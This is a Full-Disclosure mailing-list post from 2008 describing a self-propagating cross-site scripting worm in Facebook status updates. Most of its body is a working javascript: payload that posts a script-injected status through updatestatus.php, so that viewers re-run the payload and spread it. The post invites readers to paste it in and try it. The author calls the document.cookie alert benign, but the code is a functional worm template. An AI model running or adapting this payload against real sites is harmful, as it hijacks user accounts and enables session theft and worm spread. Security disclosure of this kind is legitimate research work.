[Full-disclosure] F4c3b00k Worm
- From: "Kristian Erik Hermansen" <kristian.hermansen@xxxxxxxxx>
- Date: Thu, 25 Dec 2008 06:09:17 -0800
Seems to be able to spread via automated status messages. When
another user sees the hijacked status message, they are likely to
execute the status updater payload as well, which then spreads to
anyone else who can see those status updates. This document.cookie
payload is benign. Emulation is achieved by pasting the payload below
into Firefox while on the profile.php page...
javascript:var p='profile_id='+document.getElementById('profile_id').value+'&status=<script>alert(document.cookie);</script>'+'&profile=true'+'&test_name=INLINE_STATUS_EDITOR'+'&action=OTHER_UPDATE'+'&post_form_id='+document.getElementById('post_form_id').value;hr=new
XMLHttpRequest();hr.overrideMimeType('text/html');hr.open('POST',
'updatestatus.php', true);hr.setRequestHeader('Content-type',
'application/x-www-form-urlencoded');hr.setRequestHeader('Content-length',
p.length);hr.setRequestHeader('Connection', 'close');hr.send(p);
--
Kristian Erik Hermansen
Have you tried Session Destroyer yet?
<http://kristian.hermansen.googlepages.com/session.destroyer.html>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Prev by Date: Re: [Full-disclosure] Announcing "Session Destroyer" -- Invalidate yourwebapp logins with ease!
- Next by Date: [Full-disclosure] FreeBSD 7/6x protosw kernel exploit
- Previous by thread: [Full-disclosure] DDIVRT-2008-16 Citrix Broadcast Server 6.0 login.asp SQL Injection
- Next by thread: [Full-disclosure] FreeBSD 7/6x protosw kernel exploit
- Index(es):
Relevant Pages
|
